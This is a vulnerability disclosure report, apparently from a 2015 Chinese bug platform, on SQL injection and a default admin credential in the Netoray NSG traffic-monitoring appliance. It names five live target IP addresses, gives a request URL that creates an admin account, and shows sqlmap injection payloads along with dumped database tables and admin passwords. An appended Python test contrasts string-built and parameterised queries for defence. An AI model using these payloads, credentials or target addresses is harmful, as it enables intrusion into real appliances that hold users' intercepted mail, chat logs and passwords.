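2015-03-19: Details reported to the vendor; awaiting vendor handling
2015-03-24: Vendor confirmed; details disclosed to the vendor only
2015-03-27: Details opened to third-party security partners
2015-05-18: Details disclosed to core white hats and relevant domain experts
2015-05-28: Details disclosed to regular white hats
2015-06-07: Details disclosed to intern white hats
2015-06-22: Details disclosed to the public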
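I have to say, damn: this "internet behavior management system" can actually record the content of sent and received mail for every brand of mailbox, detailed QQ chat logs, Fetion logs, Weibo logs, FTP logs, telnet logs, and the account names and passwords of every web page login, all in complete detail (extraordinarily powerful). Many universities use it, so where has the students' privacy gone? Going online through this router means "no privacy whatsoever".
The Netoray NSG internet behavior management system has a default credential: superadmin/123456. Logging in with the default credential reveals an SQL injection, and the database user has DBA privileges. The router is extraordinarily powerful: for every device that goes online through it, the content of its traffic is recorded in complete detail. (One of the cases found is a university with more than 12,000 user connections, where all of the students' online activity is fully visible.)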
Default-credential cases:
https://121.250.28.125/
https://221.123.130.107/
https://60.30.2.74/
https://119.2.27.73/
https://117.36.195.144/
https://121.250.28.125/cgi-bin/system_management/usap_admin.cgi?cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=465410561&lang=zh_CN.UTF-8
sqlmap identified the following injection points with a total of 1308 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
current database: 'NTC'
current user is DBA: True

Database: NTC
[136 tables]
+----------------------------+
| nedata_ipmacbind_record    |
| newurl                     |
| t_data_mail                |
| t_data_mobileapp           |
| t_data_netphone            |
| t_data_nettv               |
| t_data_ongame              |
| t_data_operation           |
| t_data_p2p                 |
| t_data_payinfo             |
| t_data_policyroute         |
| t_data_priviledge          |
| t_data_proxy               |
| t_data_qq_pwd              |
| t_data_qq_sn               |
| t_data_rdp                 |
| t_data_retrresult          |
| t_data_sip                 |
| t_data_smb                 |
| t_data_ssh                 |
| t_data_ssl                 |
| t_data_stock               |
| t_data_telnet              |
| t_data_telnetcmd           |
| t_data_transfile           |
| t_data_unknowurl           |
| t_rep_alertlog             |
| t_rep_app                  |
| t_rep_dataindex            |
| t_rep_flow                 |
| t_rep_get                  |
| t_rep_im                   |
| t_rep_index                |
| t_rep_mail                 |
| t_rep_post                 |
| t_rep_session              |
| t_rep_time                 |
| t_sys_aclpolicy            |
| t_sys_admin                |
| t_sys_admingroup           |
| t_sys_admingrouprolemap    |
| t_sys_adminrolemap         |
| t_sys_alertlog             |
| t_sys_app                  |
| t_sys_appbwlist            |
| t_sys_appgroup             |
| t_sys_billingip            |
| t_sys_billinglog           |
| t_sys_billingpolicy        |
| t_sys_billinguser          |
| t_sys_bwdevice             |
| t_sys_bwginfo              |
| t_sys_bwglist              |
| t_sys_bwip                 |
| t_sys_bwpolicychannel      |
| t_sys_bwpolicyvalue        |
| t_sys_bwtraffic            |
| t_sys_bypass               |
| t_sys_cltdeviceobj         |
| t_sys_cltfileobj           |
| t_sys_cltosobj             |
| t_sys_cltpolicycontent     |
| t_sys_cltpolicymain        |
| t_sys_cltpolicyuser        |
| t_sys_cltportobj           |
| t_sys_cltprocobj           |
| t_sys_cltregobj            |
| t_sys_clttime              |
| t_sys_cntuser              |
| t_sys_command_transit      |
| t_sys_customreport         |
| t_sys_customsubnet         |
| t_sys_datasync             |
| t_sys_dumptable            |
| t_sys_filefeature          |
| t_sys_functions            |
| t_sys_help                 |
| t_sys_httptype             |
| t_sys_ignoresuffix         |
| t_sys_keylib               |
| t_sys_keyword              |
| t_sys_killexecute          |
| t_sys_l3switch             |
| t_sys_localip              |
| t_sys_managelog            |
| t_sys_mobileuser_log       |
| t_sys_modules              |
| t_sys_monif                |
| t_sys_netcapture           |
| t_sys_ntpserver            |
| t_sys_pages                |
| t_sys_parameter            |
| t_sys_queryinfo            |
| t_sys_resources            |
| t_sys_retrtask             |
| t_sys_role                 |
| t_sys_roleusergroupmap     |
| t_sys_roleusermap          |
| t_sys_rule                 |
| t_sys_ruleactdef           |
| t_sys_ruleipobj            |
| t_sys_ruleopconf           |
| t_sys_ruleopdef            |
| t_sys_ruleoptdef           |
| t_sys_rulewarndef          |
| t_sys_snmp                 |
| t_sys_snmp_trap            |
| t_sys_subnetgroup          |
| t_sys_timepolicy           |
| t_sys_timepolicyscope      |
| t_sys_uplink_default_param |
| t_sys_uplink_dev_list      |
| t_sys_uplink_local         |
| t_sys_uplink_upload_index  |
| t_sys_uplink_upload_work   |
| t_sys_uplink_vector        |
| t_sys_uplinkversion        |
| t_sys_urlbwlist            |
| t_sys_urlclass             |
| t_sys_urllib               |
| t_sys_user                 |
| t_sys_user_bwlist          |
| t_sys_user_macbwlist       |
| t_sys_usergroup            |
| t_sys_useronline           |
| t_sys_useronline_history   |
| t_sys_useronlinelog        |
| t_sys_versionlog           |
| t_sys_warnmail             |
| t_sys_warnpage             |
| t_sys_webmail              |
| v_sys_adminvalidroles      |
| v_sys_adminvalidusergroups |
| v_sys_adminvalidusers      |
| v_sys_rolevalidusergroups  |
| v_sys_rolevalidusers       |
+----------------------------+

Database: NTC
Table: t_sys_user
[33 columns]
+--------------+------------------+
| Column       | Type             |
+--------------+------------------+
| check_valid  | int(11)          |
| circle_check | int(11)          |
| create_time  | datetime         |
| creator      | varchar(64)      |
| eip          | int(10) unsigned |
| end_time     | datetime         |
| false_times  | int(11)          |
| fee          | float            |
| free_audit   | int(11)          |
| gid          | int(32) unsigned |
| invalid_date | int(11)          |
| invalid_time | datetime         |
| invalid_unit | int(11)          |
| key_user     | int(11)          |
| ldap_name    | varchar(64)      |
| lock_time    | int(11)          |
| login_time   | datetime         |
| mac          | varchar(32)      |
| name         | varchar(64)      |
| permit_times | int(11)          |
| pwd          | varchar(64)      |
| real_name    | varchar(64)      |
| settle_type  | int(11)          |
| share_number | int(11)          |
| sip          | int(10) unsigned |
| start_time   | datetime         |
| status       | char(1)          |
| tel          | char(32)         |
| uid          | int(32) unsigned |
| unlock_time  | datetime         |
| valid_date   | int(11)          |
| valid_time   | datetime         |
| valid_unit   | int(11)          |
+--------------+------------------+

Database: NTC
Table: t_sys_user
[0 entries]
+----------+-----+
| key_user | pwd |
+----------+-----+
+----------+-----+

Database: NTC
Table: t_sys_user
[0 entries]
+----------+-----+------+
| key_user | pwd | name |
+----------+-----+------+
+----------+-----+------+

Database: NTC
Table: t_sys_admin
[17 columns]
+---------------+---------------------+
| Column        | Type                |
+---------------+---------------------+
| activated     | char(1)             |
| burst         | int(32) unsigned    |
| email         | char(64)            |
| endtime       | datetime            |
| ipaddr        | varchar(16)         |
| locked        | tinyint(3) unsigned |
| lockedtime    | datetime            |
| logincount    | tinyint(3) unsigned |
| macaddr       | varchar(18)         |
| maxlogincount | tinyint(3) unsigned |
| name          | char(64)            |
| password      | varchar(16)         |
| shortcut      | varchar(256)        |
| starttime     | datetime            |
| ugid          | int(32) unsigned    |
| uid           | int(32) unsigned    |
| unlocktime    | int(32) unsigned    |
+---------------+---------------------+

Database: NTC
Table: t_sys_admin
[5 entries]
+-----+------------+----------+
| uid | name       | password |
+-----+------------+----------+
| 1   | superadmin | 123456   |
| 2   | manager    | 123456   |
| 3   | maintainer | 123456   |
| 80  | asdasd     | 123456   |
| 81  | 0          | 123456   |
+-----+------------+----------+
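Added example (not part of the original report and not the vendor's code): a small regression check showing why the `adminname` payload reported above acts as a boolean oracle against string-built SQL, and why a bound parameter removes it. The query shape, the sqlite3 stand-in for MySQL, the sample rows and all function names are assumptions; only the table and column names come from the dump above.

```python
import re
import sqlite3

# Table/column names (t_sys_admin, name, password) are from the dump above.
# Everything else here is an assumption for illustration: sqlite3 stands in
# for the appliance's MySQL, and the rows are constructed sample data.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE t_sys_admin (uid INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO t_sys_admin (name, password) VALUES (?, ?)",
        [("superadmin", "sample-1"), ("manager", "sample-2"), ("asdasd", "sample-3")],
    )
    return db

# The adminname value from the reported boolean-based payload, plus a
# constructed twin whose numeric comparison is false. A safe endpoint
# answers both identically.
PROBE_TRUE = "asdasd' AND 9685=9685 AND 'eeEm'='eeEm"
PROBE_FALSE = "asdasd' AND 9685=9686 AND 'eeEm'='eeEm"

def name_taken_concat(db, adminname):
    """ASSUMED vulnerable shape: duplicate-name check built by concatenation."""
    sql = "SELECT COUNT(*) FROM t_sys_admin WHERE name = '" + adminname + "'"
    return db.execute(sql).fetchone()[0] > 0

def name_taken_bound(db, adminname):
    """Hardened shape: the value travels as a bound parameter, never as SQL."""
    row = db.execute(
        "SELECT COUNT(*) FROM t_sys_admin WHERE name = ?", (adminname,)
    ).fetchone()
    return row[0] > 0

# Defence in depth: allow-list the field before it reaches any query.
# 64 matches the char(64) width of t_sys_admin.name in the dump.
ADMIN_NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def valid_admin_name(adminname):
    return ADMIN_NAME_RE.fullmatch(adminname) is not None

def leaks_boolean(check, db):
    """True when the two probes get different answers, i.e. the response
    reveals one bit of a condition chosen by the caller."""
    return check(db, PROBE_TRUE) != check(db, PROBE_FALSE)

if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks:", leaks_boolean(name_taken_concat, db))
    print("bound parameter leaks:   ", leaks_boolean(name_taken_bound, db))
    print("allow-list accepts probe:", valid_admin_name(PROBE_TRUE))
```

The same paired-probe check can be kept as a regression test for any handler that takes `adminname`, so a later change that reintroduces string-built SQL fails the test.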
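Vendor contact
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-03-24 08:56
CNVD confirmed and reproduced the reported issue, and CNVD notified the software vendor, 深圳莱克斯公司 (Shenzhen Laikesi).
None yet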